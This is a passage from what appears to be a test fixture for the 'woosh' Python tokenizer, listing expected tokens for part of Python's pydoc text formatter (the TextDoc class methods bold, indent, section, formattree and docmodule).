woosh.Token(woosh.NAME, 'self', 1153, 42, 1153, 46),
woosh.Token(woosh.OP, '.', 1153, 46, 1153, 47),
woosh.Token(woosh.NAME, 'maxstring', 1153, 47, 1153, 56),
woosh.Token(woosh.OP, ')', 1153, 56, 1153, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1153, 57, 1154, 0),
woosh.Token(woosh.DEDENT, ' ', 1154, 0, 1154, 8),
woosh.Token(woosh.NAME, 'except', 1154, 8, 1154, 14),
woosh.Token(woosh.OP, ':', 1154, 14, 1154, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1154, 15, 1155, 0),
woosh.Token(woosh.INDENT, ' ', 1155, 0, 1155, 12),
woosh.Token(woosh.NAME, 'return', 1155, 12, 1155, 18),
woosh.Token(woosh.STRING, "'<%s instance>'", 1155, 19, 1155, 34),
woosh.Token(woosh.OP, '%', 1155, 35, 1155, 36),
woosh.Token(woosh.NAME, 'x', 1155, 37, 1155, 38),
woosh.Token(woosh.OP, '.', 1155, 38, 1155, 39),
woosh.Token(woosh.NAME, '__class__', 1155, 39, 1155, 48),
woosh.Token(woosh.OP, '.', 1155, 48, 1155, 49),
woosh.Token(woosh.NAME, '__name__', 1155, 49, 1155, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1155, 57, 1156, 0),
woosh.Token(woosh.DEDENT, '', 1157, 0, 1157, 0),
woosh.Token(woosh.DEDENT, '', 1157, 0, 1157, 0),
woosh.Token(woosh.DEDENT, '', 1157, 0, 1157, 0),
woosh.Token(woosh.NAME, 'class', 1157, 0, 1157, 5),
woosh.Token(woosh.NAME, 'TextDoc', 1157, 6, 1157, 13),
woosh.Token(woosh.OP, '(', 1157, 13, 1157, 14),
woosh.Token(woosh.NAME, 'Doc', 1157, 14, 1157, 17),
woosh.Token(woosh.OP, ')', 1157, 17, 1157, 18),
woosh.Token(woosh.OP, ':', 1157, 18, 1157, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1157, 19, 1158, 0),
woosh.Token(woosh.INDENT, ' ', 1158, 0, 1158, 4),
woosh.Token(woosh.STRING, '"""Formatter class for text documentation."""', 1158, 4, 1158, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1158, 49, 1159, 0),
woosh.Token(woosh.COMMENT, '# ------------------------------------------- text formatting utilities', 1160, 4, 1160, 75),
woosh.Token(woosh.NAME, '_repr_instance', 1162, 4, 1162, 18),
woosh.Token(woosh.OP, '=', 1162, 19, 1162, 20),
woosh.Token(woosh.NAME, 'TextRepr', 1162, 21, 1162, 29),
woosh.Token(woosh.OP, '(', 1162, 29, 1162, 30),
woosh.Token(woosh.OP, ')', 1162, 30, 1162, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1162, 31, 1163, 0),
woosh.Token(woosh.NAME, 'repr', 1163, 4, 1163, 8),
woosh.Token(woosh.OP, '=', 1163, 9, 1163, 10),
woosh.Token(woosh.NAME, '_repr_instance', 1163, 11, 1163, 25),
woosh.Token(woosh.OP, '.', 1163, 25, 1163, 26),
woosh.Token(woosh.NAME, 'repr', 1163, 26, 1163, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1163, 30, 1164, 0),
woosh.Token(woosh.NAME, 'def', 1165, 4, 1165, 7),
woosh.Token(woosh.NAME, 'bold', 1165, 8, 1165, 12),
woosh.Token(woosh.OP, '(', 1165, 12, 1165, 13),
woosh.Token(woosh.NAME, 'self', 1165, 13, 1165, 17),
woosh.Token(woosh.OP, ',', 1165, 17, 1165, 18),
woosh.Token(woosh.NAME, 'text', 1165, 19, 1165, 23),
woosh.Token(woosh.OP, ')', 1165, 23, 1165, 24),
woosh.Token(woosh.OP, ':', 1165, 24, 1165, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1165, 25, 1166, 0),
woosh.Token(woosh.INDENT, ' ', 1166, 0, 1166, 8),
woosh.Token(woosh.STRING, '"""Format a string in bold by overstriking."""', 1166, 8, 1166, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1166, 54, 1167, 0),
woosh.Token(woosh.NAME, 'return', 1167, 8, 1167, 14),
woosh.Token(woosh.STRING, "''", 1167, 15, 1167, 17),
woosh.Token(woosh.OP, '.', 1167, 17, 1167, 18),
woosh.Token(woosh.NAME, 'join', 1167, 18, 1167, 22),
woosh.Token(woosh.OP, '(', 1167, 22, 1167, 23),
woosh.Token(woosh.NAME, 'ch', 1167, 23, 1167, 25),
woosh.Token(woosh.OP, '+', 1167, 26, 1167, 27),
woosh.Token(woosh.STRING, "'\\b'", 1167, 28, 1167, 32),
woosh.Token(woosh.OP, '+', 1167, 33, 1167, 34),
woosh.Token(woosh.NAME, 'ch', 1167, 35, 1167, 37),
woosh.Token(woosh.NAME, 'for', 1167, 38, 1167, 41),
woosh.Token(woosh.NAME, 'ch', 1167, 42, 1167, 44),
woosh.Token(woosh.NAME, 'in', 1167, 45, 1167, 47),
woosh.Token(woosh.NAME, 'text', 1167, 48, 1167, 52),
woosh.Token(woosh.OP, ')', 1167, 52, 1167, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1167, 53, 1168, 0),
woosh.Token(woosh.DEDENT, ' ', 1169, 0, 1169, 4),
woosh.Token(woosh.NAME, 'def', 1169, 4, 1169, 7),
woosh.Token(woosh.NAME, 'indent', 1169, 8, 1169, 14),
woosh.Token(woosh.OP, '(', 1169, 14, 1169, 15),
woosh.Token(woosh.NAME, 'self', 1169, 15, 1169, 19),
woosh.Token(woosh.OP, ',', 1169, 19, 1169, 20),
woosh.Token(woosh.NAME, 'text', 1169, 21, 1169, 25),
woosh.Token(woosh.OP, ',', 1169, 25, 1169, 26),
woosh.Token(woosh.NAME, 'prefix', 1169, 27, 1169, 33),
woosh.Token(woosh.OP, '=', 1169, 33, 1169, 34),
woosh.Token(woosh.STRING, "' '", 1169, 34, 1169, 40),
woosh.Token(woosh.OP, ')', 1169, 40, 1169, 41),
woosh.Token(woosh.OP, ':', 1169, 41, 1169, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1169, 42, 1170, 0),
woosh.Token(woosh.INDENT, ' ', 1170, 0, 1170, 8),
woosh.Token(woosh.STRING, '"""Indent text by prepending a given prefix to each line."""', 1170, 8, 1170, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 1170, 68, 1171, 0),
woosh.Token(woosh.NAME, 'if', 1171, 8, 1171, 10),
woosh.Token(woosh.NAME, 'not', 1171, 11, 1171, 14),
woosh.Token(woosh.NAME, 'text', 1171, 15, 1171, 19),
woosh.Token(woosh.OP, ':', 1171, 19, 1171, 20),
woosh.Token(woosh.NAME, 'return', 1171, 21, 1171, 27),
woosh.Token(woosh.STRING, "''", 1171, 28, 1171, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1171, 30, 1172, 0),
woosh.Token(woosh.NAME, 'lines', 1172, 8, 1172, 13),
woosh.Token(woosh.OP, '=', 1172, 14, 1172, 15),
woosh.Token(woosh.OP, '[', 1172, 16, 1172, 17),
woosh.Token(woosh.NAME, 'prefix', 1172, 17, 1172, 23),
woosh.Token(woosh.OP, '+', 1172, 24, 1172, 25),
woosh.Token(woosh.NAME, 'line', 1172, 26, 1172, 30),
woosh.Token(woosh.NAME, 'for', 1172, 31, 1172, 34),
woosh.Token(woosh.NAME, 'line', 1172, 35, 1172, 39),
woosh.Token(woosh.NAME, 'in', 1172, 40, 1172, 42),
woosh.Token(woosh.NAME, 'text', 1172, 43, 1172, 47),
woosh.Token(woosh.OP, '.', 1172, 47, 1172, 48),
woosh.Token(woosh.NAME, 'split', 1172, 48, 1172, 53),
woosh.Token(woosh.OP, '(', 1172, 53, 1172, 54),
woosh.Token(woosh.STRING, "'\\n'", 1172, 54, 1172, 58),
woosh.Token(woosh.OP, ')', 1172, 58, 1172, 59),
woosh.Token(woosh.OP, ']', 1172, 59, 1172, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1172, 60, 1173, 0),
woosh.Token(woosh.NAME, 'if', 1173, 8, 1173, 10),
woosh.Token(woosh.NAME, 'lines', 1173, 11, 1173, 16),
woosh.Token(woosh.OP, ':', 1173, 16, 1173, 17),
woosh.Token(woosh.NAME, 'lines', 1173, 18, 1173, 23),
woosh.Token(woosh.OP, '[', 1173, 23, 1173, 24),
woosh.Token(woosh.OP, '-', 1173, 24, 1173, 25),
woosh.Token(woosh.NUMBER, '1', 1173, 25, 1173, 26),
woosh.Token(woosh.OP, ']', 1173, 26, 1173, 27),
woosh.Token(woosh.OP, '=', 1173, 28, 1173, 29),
woosh.Token(woosh.NAME, 'lines', 1173, 30, 1173, 35),
woosh.Token(woosh.OP, '[', 1173, 35, 1173, 36),
woosh.Token(woosh.OP, '-', 1173, 36, 1173, 37),
woosh.Token(woosh.NUMBER, '1', 1173, 37, 1173, 38),
woosh.Token(woosh.OP, ']', 1173, 38, 1173, 39),
woosh.Token(woosh.OP, '.', 1173, 39, 1173, 40),
woosh.Token(woosh.NAME, 'rstrip', 1173, 40, 1173, 46),
woosh.Token(woosh.OP, '(', 1173, 46, 1173, 47),
woosh.Token(woosh.OP, ')', 1173, 47, 1173, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1173, 48, 1174, 0),
woosh.Token(woosh.NAME, 'return', 1174, 8, 1174, 14),
woosh.Token(woosh.STRING, "'\\n'", 1174, 15, 1174, 19),
woosh.Token(woosh.OP, '.', 1174, 19, 1174, 20),
woosh.Token(woosh.NAME, 'join', 1174, 20, 1174, 24),
woosh.Token(woosh.OP, '(', 1174, 24, 1174, 25),
woosh.Token(woosh.NAME, 'lines', 1174, 25, 1174, 30),
woosh.Token(woosh.OP, ')', 1174, 30, 1174, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1174, 31, 1175, 0),
woosh.Token(woosh.DEDENT, ' ', 1176, 0, 1176, 4),
woosh.Token(woosh.NAME, 'def', 1176, 4, 1176, 7),
woosh.Token(woosh.NAME, 'section', 1176, 8, 1176, 15),
woosh.Token(woosh.OP, '(', 1176, 15, 1176, 16),
woosh.Token(woosh.NAME, 'self', 1176, 16, 1176, 20),
woosh.Token(woosh.OP, ',', 1176, 20, 1176, 21),
woosh.Token(woosh.NAME, 'title', 1176, 22, 1176, 27),
woosh.Token(woosh.OP, ',', 1176, 27, 1176, 28),
woosh.Token(woosh.NAME, 'contents', 1176, 29, 1176, 37),
woosh.Token(woosh.OP, ')', 1176, 37, 1176, 38),
woosh.Token(woosh.OP, ':', 1176, 38, 1176, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1176, 39, 1177, 0),
woosh.Token(woosh.INDENT, ' ', 1177, 0, 1177, 8),
woosh.Token(woosh.STRING, '"""Format a section with a given heading."""', 1177, 8, 1177, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1177, 52, 1178, 0),
woosh.Token(woosh.NAME, 'clean_contents', 1178, 8, 1178, 22),
woosh.Token(woosh.OP, '=', 1178, 23, 1178, 24),
woosh.Token(woosh.NAME, 'self', 1178, 25, 1178, 29),
woosh.Token(woosh.OP, '.', 1178, 29, 1178, 30),
woosh.Token(woosh.NAME, 'indent', 1178, 30, 1178, 36),
woosh.Token(woosh.OP, '(', 1178, 36, 1178, 37),
woosh.Token(woosh.NAME, 'contents', 1178, 37, 1178, 45),
woosh.Token(woosh.OP, ')', 1178, 45, 1178, 46),
woosh.Token(woosh.OP, '.', 1178, 46, 1178, 47),
woosh.Token(woosh.NAME, 'rstrip', 1178, 47, 1178, 53),
woosh.Token(woosh.OP, '(', 1178, 53, 1178, 54),
woosh.Token(woosh.OP, ')', 1178, 54, 1178, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1178, 55, 1179, 0),
woosh.Token(woosh.NAME, 'return', 1179, 8, 1179, 14),
woosh.Token(woosh.NAME, 'self', 1179, 15, 1179, 19),
woosh.Token(woosh.OP, '.', 1179, 19, 1179, 20),
woosh.Token(woosh.NAME, 'bold', 1179, 20, 1179, 24),
woosh.Token(woosh.OP, '(', 1179, 24, 1179, 25),
woosh.Token(woosh.NAME, 'title', 1179, 25, 1179, 30),
woosh.Token(woosh.OP, ')', 1179, 30, 1179, 31),
woosh.Token(woosh.OP, '+', 1179, 32, 1179, 33),
woosh.Token(woosh.STRING, "'\\n'", 1179, 34, 1179, 38),
woosh.Token(woosh.OP, '+', 1179, 39, 1179, 40),
woosh.Token(woosh.NAME, 'clean_contents', 1179, 41, 1179, 55),
woosh.Token(woosh.OP, '+', 1179, 56, 1179, 57),
woosh.Token(woosh.STRING, "'\\n\\n'", 1179, 58, 1179, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1179, 64, 1180, 0),
woosh.Token(woosh.COMMENT, '# ---------------------------------------------- type-specific routines', 1181, 4, 1181, 75),
woosh.Token(woosh.DEDENT, ' ', 1183, 0, 1183, 4),
woosh.Token(woosh.NAME, 'def', 1183, 4, 1183, 7),
woosh.Token(woosh.NAME, 'formattree', 1183, 8, 1183, 18),
woosh.Token(woosh.OP, '(', 1183, 18, 1183, 19),
woosh.Token(woosh.NAME, 'self', 1183, 19, 1183, 23),
woosh.Token(woosh.OP, ',', 1183, 23, 1183, 24),
woosh.Token(woosh.NAME, 'tree', 1183, 25, 1183, 29),
woosh.Token(woosh.OP, ',', 1183, 29, 1183, 30),
woosh.Token(woosh.NAME, 'modname', 1183, 31, 1183, 38),
woosh.Token(woosh.OP, ',', 1183, 38, 1183, 39),
woosh.Token(woosh.NAME, 'parent', 1183, 40, 1183, 46),
woosh.Token(woosh.OP, '=', 1183, 46, 1183, 47),
woosh.Token(woosh.NAME, 'None', 1183, 47, 1183, 51),
woosh.Token(woosh.OP, ',', 1183, 51, 1183, 52),
woosh.Token(woosh.NAME, 'prefix', 1183, 53, 1183, 59),
woosh.Token(woosh.OP, '=', 1183, 59, 1183, 60),
woosh.Token(woosh.STRING, "''", 1183, 60, 1183, 62),
woosh.Token(woosh.OP, ')', 1183, 62, 1183, 63),
woosh.Token(woosh.OP, ':', 1183, 63, 1183, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1183, 64, 1184, 0),
woosh.Token(woosh.INDENT, ' ', 1184, 0, 1184, 8),
woosh.Token(woosh.STRING, '"""Render in text a class tree as returned by inspect.getclasstree()."""', 1184, 8, 1184, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 1184, 80, 1185, 0),
woosh.Token(woosh.NAME, 'result', 1185, 8, 1185, 14),
woosh.Token(woosh.OP, '=', 1185, 15, 1185, 16),
woosh.Token(woosh.STRING, "''", 1185, 17, 1185, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1185, 19, 1186, 0),
woosh.Token(woosh.NAME, 'for', 1186, 8, 1186, 11),
woosh.Token(woosh.NAME, 'entry', 1186, 12, 1186, 17),
woosh.Token(woosh.NAME, 'in', 1186, 18, 1186, 20),
woosh.Token(woosh.NAME, 'tree', 1186, 21, 1186, 25),
woosh.Token(woosh.OP, ':', 1186, 25, 1186, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1186, 26, 1187, 0),
woosh.Token(woosh.INDENT, ' ', 1187, 0, 1187, 12),
woosh.Token(woosh.NAME, 'if', 1187, 12, 1187, 14),
woosh.Token(woosh.NAME, 'type', 1187, 15, 1187, 19),
woosh.Token(woosh.OP, '(', 1187, 19, 1187, 20),
woosh.Token(woosh.NAME, 'entry', 1187, 20, 1187, 25),
woosh.Token(woosh.OP, ')', 1187, 25, 1187, 26),
woosh.Token(woosh.NAME, 'is', 1187, 27, 1187, 29),
woosh.Token(woosh.NAME, 'type', 1187, 30, 1187, 34),
woosh.Token(woosh.OP, '(', 1187, 34, 1187, 35),
woosh.Token(woosh.OP, '(', 1187, 35, 1187, 36),
woosh.Token(woosh.OP, ')', 1187, 36, 1187, 37),
woosh.Token(woosh.OP, ')', 1187, 37, 1187, 38),
woosh.Token(woosh.OP, ':', 1187, 38, 1187, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1187, 39, 1188, 0),
woosh.Token(woosh.INDENT, ' ', 1188, 0, 1188, 16),
woosh.Token(woosh.NAME, 'c', 1188, 16, 1188, 17),
woosh.Token(woosh.OP, ',', 1188, 17, 1188, 18),
woosh.Token(woosh.NAME, 'bases', 1188, 19, 1188, 24),
woosh.Token(woosh.OP, '=', 1188, 25, 1188, 26),
woosh.Token(woosh.NAME, 'entry', 1188, 27, 1188, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1188, 32, 1189, 0),
woosh.Token(woosh.NAME, 'result', 1189, 16, 1189, 22),
woosh.Token(woosh.OP, '=', 1189, 23, 1189, 24),
woosh.Token(woosh.NAME, 'result', 1189, 25, 1189, 31),
woosh.Token(woosh.OP, '+', 1189, 32, 1189, 33),
woosh.Token(woosh.NAME, 'prefix', 1189, 34, 1189, 40),
woosh.Token(woosh.OP, '+', 1189, 41, 1189, 42),
woosh.Token(woosh.NAME, 'classname', 1189, 43, 1189, 52),
woosh.Token(woosh.OP, '(', 1189, 52, 1189, 53),
woosh.Token(woosh.NAME, 'c', 1189, 53, 1189, 54),
woosh.Token(woosh.OP, ',', 1189, 54, 1189, 55),
woosh.Token(woosh.NAME, 'modname', 1189, 56, 1189, 63),
woosh.Token(woosh.OP, ')', 1189, 63, 1189, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1189, 64, 1190, 0),
woosh.Token(woosh.NAME, 'if', 1190, 16, 1190, 18),
woosh.Token(woosh.NAME, 'bases', 1190, 19, 1190, 24),
woosh.Token(woosh.NAME, 'and', 1190, 25, 1190, 28),
woosh.Token(woosh.NAME, 'bases', 1190, 29, 1190, 34),
woosh.Token(woosh.OP, '!=', 1190, 35, 1190, 37),
woosh.Token(woosh.OP, '(', 1190, 38, 1190, 39),
woosh.Token(woosh.NAME, 'parent', 1190, 39, 1190, 45),
woosh.Token(woosh.OP, ',', 1190, 45, 1190, 46),
woosh.Token(woosh.OP, ')', 1190, 46, 1190, 47),
woosh.Token(woosh.OP, ':', 1190, 47, 1190, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1190, 48, 1191, 0),
woosh.Token(woosh.INDENT, ' ', 1191, 0, 1191, 20),
woosh.Token(woosh.NAME, 'parents', 1191, 20, 1191, 27),
woosh.Token(woosh.OP, '=', 1191, 28, 1191, 29),
woosh.Token(woosh.OP, '(', 1191, 30, 1191, 31),
woosh.Token(woosh.NAME, 'classname', 1191, 31, 1191, 40),
woosh.Token(woosh.OP, '(', 1191, 40, 1191, 41),
woosh.Token(woosh.NAME, 'c', 1191, 41, 1191, 42),
woosh.Token(woosh.OP, ',', 1191, 42, 1191, 43),
woosh.Token(woosh.NAME, 'modname', 1191, 44, 1191, 51),
woosh.Token(woosh.OP, ')', 1191, 51, 1191, 52),
woosh.Token(woosh.NAME, 'for', 1191, 53, 1191, 56),
woosh.Token(woosh.NAME, 'c', 1191, 57, 1191, 58),
woosh.Token(woosh.NAME, 'in', 1191, 59, 1191, 61),
woosh.Token(woosh.NAME, 'bases', 1191, 62, 1191, 67),
woosh.Token(woosh.OP, ')', 1191, 67, 1191, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 1191, 68, 1192, 0),
woosh.Token(woosh.NAME, 'result', 1192, 20, 1192, 26),
woosh.Token(woosh.OP, '=', 1192, 27, 1192, 28),
woosh.Token(woosh.NAME, 'result', 1192, 29, 1192, 35),
woosh.Token(woosh.OP, '+', 1192, 36, 1192, 37),
woosh.Token(woosh.STRING, "'(%s)'", 1192, 38, 1192, 44),
woosh.Token(woosh.OP, '%', 1192, 45, 1192, 46),
woosh.Token(woosh.STRING, "', '", 1192, 47, 1192, 51),
woosh.Token(woosh.OP, '.', 1192, 51, 1192, 52),
woosh.Token(woosh.NAME, 'join', 1192, 52, 1192, 56),
woosh.Token(woosh.OP, '(', 1192, 56, 1192, 57),
woosh.Token(woosh.NAME, 'parents', 1192, 57, 1192, 64),
woosh.Token(woosh.OP, ')', 1192, 64, 1192, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1192, 65, 1193, 0),
woosh.Token(woosh.DEDENT, ' ', 1193, 0, 1193, 16),
woosh.Token(woosh.NAME, 'result', 1193, 16, 1193, 22),
woosh.Token(woosh.OP, '=', 1193, 23, 1193, 24),
woosh.Token(woosh.NAME, 'result', 1193, 25, 1193, 31),
woosh.Token(woosh.OP, '+', 1193, 32, 1193, 33),
woosh.Token(woosh.STRING, "'\\n'", 1193, 34, 1193, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1193, 38, 1194, 0),
woosh.Token(woosh.DEDENT, ' ', 1194, 0, 1194, 12),
woosh.Token(woosh.NAME, 'elif', 1194, 12, 1194, 16),
woosh.Token(woosh.NAME, 'type', 1194, 17, 1194, 21),
woosh.Token(woosh.OP, '(', 1194, 21, 1194, 22),
woosh.Token(woosh.NAME, 'entry', 1194, 22, 1194, 27),
woosh.Token(woosh.OP, ')', 1194, 27, 1194, 28),
woosh.Token(woosh.NAME, 'is', 1194, 29, 1194, 31),
woosh.Token(woosh.NAME, 'type', 1194, 32, 1194, 36),
woosh.Token(woosh.OP, '(', 1194, 36, 1194, 37),
woosh.Token(woosh.OP, '[', 1194, 37, 1194, 38),
woosh.Token(woosh.OP, ']', 1194, 38, 1194, 39),
woosh.Token(woosh.OP, ')', 1194, 39, 1194, 40),
woosh.Token(woosh.OP, ':', 1194, 40, 1194, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1194, 41, 1195, 0),
woosh.Token(woosh.INDENT, ' ', 1195, 0, 1195, 16),
woosh.Token(woosh.NAME, 'result', 1195, 16, 1195, 22),
woosh.Token(woosh.OP, '=', 1195, 23, 1195, 24),
woosh.Token(woosh.NAME, 'result', 1195, 25, 1195, 31),
woosh.Token(woosh.OP, '+', 1195, 32, 1195, 33),
woosh.Token(woosh.NAME, 'self', 1195, 34, 1195, 38),
woosh.Token(woosh.OP, '.', 1195, 38, 1195, 39),
woosh.Token(woosh.NAME, 'formattree', 1195, 39, 1195, 49),
woosh.Token(woosh.OP, '(', 1195, 49, 1195, 50),
woosh.Token(woosh.NAME, 'entry', 1196, 20, 1196, 25),
woosh.Token(woosh.OP, ',', 1196, 25, 1196, 26),
woosh.Token(woosh.NAME, 'modname', 1196, 27, 1196, 34),
woosh.Token(woosh.OP, ',', 1196, 34, 1196, 35),
woosh.Token(woosh.NAME, 'c', 1196, 36, 1196, 37),
woosh.Token(woosh.OP, ',', 1196, 37, 1196, 38),
woosh.Token(woosh.NAME, 'prefix', 1196, 39, 1196, 45),
woosh.Token(woosh.OP, '+', 1196, 46, 1196, 47),
woosh.Token(woosh.STRING, "' '", 1196, 48, 1196, 54),
woosh.Token(woosh.OP, ')', 1196, 54, 1196, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1196, 55, 1197, 0),
woosh.Token(woosh.DEDENT, ' ', 1197, 0, 1197, 8),
woosh.Token(woosh.DEDENT, '', 1197, 8, 1197, 8),
woosh.Token(woosh.NAME, 'return', 1197, 8, 1197, 14),
woosh.Token(woosh.NAME, 'result', 1197, 15, 1197, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1197, 21, 1198, 0),
woosh.Token(woosh.DEDENT, ' ', 1199, 0, 1199, 4),
woosh.Token(woosh.NAME, 'def', 1199, 4, 1199, 7),
woosh.Token(woosh.NAME, 'docmodule', 1199, 8, 1199, 17),
woosh.Token(woosh.OP, '(', 1199, 17, 1199, 18),
woosh.Token(woosh.NAME, 'self', 1199, 18, 1199, 22),
woosh.Token(woosh.OP, ',', 1199, 22, 1199, 23),
woosh.Token(woosh.NAME, 'object', 1199, 24, 1199, 30),
woosh.Token(woosh.OP, ',', 1199, 30, 1199, 31),
woosh.Token(woosh.NAME, 'name', 1199, 32, 1199, 36),
woosh.Token(woosh.OP, '=', 1199, 36, 1199, 37),
woosh.Token(woosh.NAME, 'None', 1199, 37, 1199, 41),
woosh.Token(woosh.OP, ',', 1199, 41, 1199, 42),
woosh.Token(woosh.NAME, 'mod', 1199, 43, 1199, 46),
woosh.Token(woosh.OP, '=', 1199, 46, 1199, 47),
woosh.Token(woosh.NAME, 'None', 1199, 47, 1199, 51),
woosh.Token(woosh.OP, ')', 1199, 51, 1199, 52),
woosh.Token(woosh.OP, ':', 1199, 52, 1199, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1199, 53, 1200, 0),
woosh.Token(woosh.INDENT, ' ', 1200, 0, 1200, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a given module object."""', 1200, 8, 1200, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 1200, 67, 1201, 0),
woosh.Token(woosh.NAME, 'name', 1201, 8, 1201, 12),
woosh.Token(woosh.OP, '=', 1201, 13, 1201, 14),
woosh.Token(woosh.NAME, 'object', 1201, 15, 1201, 21),
woosh.Token(woosh.OP, '.', 1201, 21, 1201, 22),
woosh.Token(woosh.NAME, '__name__', 1201, 22, 1201, 30),
woosh.Token(woosh.COMMENT, '# ignore the passed-in name', 1201, 31, 1201, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1201, 58, 1202, 0),
woosh.Token(woosh.NAME, 'synop', 1202, 8, 1202, 13),
woosh.Token(woosh.OP, ',', 1202, 13, 1202, 14),
woosh.Token(woosh.NAME, 'desc', 1202, 15, 1202, 19),
woosh.Token(woosh.OP, '=', 1202, 20, 1202, 21),
woosh.Token(woosh.NAME, 'splitdoc', 1202, 22, 1202, 30),
woosh.Token(woosh.OP, '(', 1202, 30, 1202, 31),
woosh.Token(woosh.NAME, 'getdoc', 1202, 31, 1202, 37),
woosh.Token(woosh.OP, '(', 1202, 37, 1202, 38),
woosh.Token(woosh.NAME, 'object', 1202, 38, 1202, 44),
woosh.Token(woosh.OP, ')', 1202, 44, 1202, 45),
woosh.Token(woosh.OP, ')', 1202, 45, 1202, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1202, 46, 1203, 0),
woosh.Token(woosh.NAME, 'result', 1203, 8, 1203, 14),
woosh.Token(woosh.OP, '=', 1203, 15, 1203, 16),
woosh.Token(woosh.NAME, 'self', 1203, 17, 1203, 21),
woosh.Token(woosh.OP, '.', 1203, 21, 1203, 22),
woosh.Token(woosh.NAME, 'section', 1203, 22, 1203, 29),
woosh.Token(woosh.OP, '(', 1203, 29, 1203, 30),
woosh.Token(woosh.STRING, "'NAME'", 1203, 30, 1203, 36),
woosh.Token(woosh.OP, ',', 1203, 36, 1203, 37),
woosh.Token(woosh.NAME, 'name', 1203, 38, 1203, 42),
woosh.Token(woosh.OP, '+', 1203, 43, 1203, 44),
woosh.Token(woosh.OP, '(', 1203, 45, 1203, 46),
woosh.Token(woosh.NAME, 'synop', 1203, 46, 1203, 51),
woosh.Token(woosh.NAME, 'and', 1203, 52, 1203, 55),
woosh.Token(woosh.STRING, "' - '", 1203, 56, 1203, 61),
woosh.Token(woosh.OP, '+', 1203, 62, 1203, 63),
woosh.Token(woosh.NAME, 'synop', 1203, 64, 1203, 69),
woosh.Token(woosh.OP, ')', 1203, 69, 1203, 70),
woosh.Token(woosh.OP, ')', 1203, 70, 1203, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1203, 71, 1204, 0),
woosh.Token(woosh.NAME, 'all', 1204, 8, 1204, 11),
woosh.Token(woosh.OP, '=', 1204, 12, 1204, 13),
woosh.Token(woosh.NAME, 'getattr', 1204, 14, 1204, 21),
woosh.Token(woosh.OP, '(', 1204, 21, 1204, 22),
woosh.Token(woosh.NAME, 'object', 1204, 22, 1204, 28),
woosh.Token(woosh.OP, ',', 1204, 28, 1204, 29),
woosh.Token(woosh.STRING, "'__all__'", 1204, 30, 1204, 39),
woosh.Token(woosh.OP, ',', 1204, 39, 1204, 40),
woosh.Token(woosh.NAME, 'None', 1204, 41, 1204, 45),
woosh.Token(woosh.OP, ')', 1204, 45, 1204, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1204, 46, 1205, 0),
woosh.Token(woosh.NAME, 'docloc', 1205, 8, 1205, 14),
woosh.Token(woosh.OP, '=', 1205, 15, 1205, 16),
woosh.Token(woosh.NAME, 'self', 1205, 17, 1205, 21),
woosh.Token(woosh.OP, '.', 1205, 21, 1205, 22),
woosh.Token(woosh.NAME, 'getdocloc', 1205, 22, 1205, 31),
woosh.Token(woosh.OP, '(', 1205, 31, 1205, 32),
woosh.Token(woosh.NAME, 'object', 1205, 32, 1205, 38),
woosh.Token(woosh.OP, ')', 1205, 38, 1205, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1205, 39, 1206, 0),
woosh.Token(woosh.NAME, 'if', 1206, 8, 1206, 10),
woosh.Token(woosh.NAME, 'docloc', 1206, 11, 1206, 17),
woosh.Token(woosh.NAME, 'is', 1206, 18, 1206, 20),
woosh.Token(woosh.NAME, 'not', 1206, 21, 1206, 24),
woosh.Token(woosh.NAME, 'None', 1206, 25, 1206, 29),
woosh.Token(woosh.OP, ':', 1206, 29, 1206, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1206, 30, 1207, 0),
woosh.Token(woosh.INDENT, ' ', 1207, 0, 1207, 12),
woosh.Token(woosh.NAME, 'result', 1207, 12, 1207, 18),
woosh.Token(woosh.OP, '=', 1207, 19, 1207, 20),
woosh.Token(woosh.NAME, 'result', 1207, 21, 1207, 27),
woosh.Token(woosh.OP, '+', 1207, 28, 1207, 29),
woosh.Token(woosh.NAME, 'self', 1207, 30, 1207, 34),
woosh.Token(woosh.OP, '.', 1207, 34, 1207, 35),
woosh.Token(woosh.NAME, 'section', 1207, 35, 1207, 42),
woosh.Token(woosh.OP, '(', 1207, 42, 1207, 43),
woosh.Token(woosh.STRING, "'MODULE REFERENCE'", 1207, 43, 1207, 61),
woosh.Token(woosh.OP, ',', 1207, 61, 1207, 62),
woosh.Token(woosh.NAME, 'docloc', 1207, 63, 1207, 69),
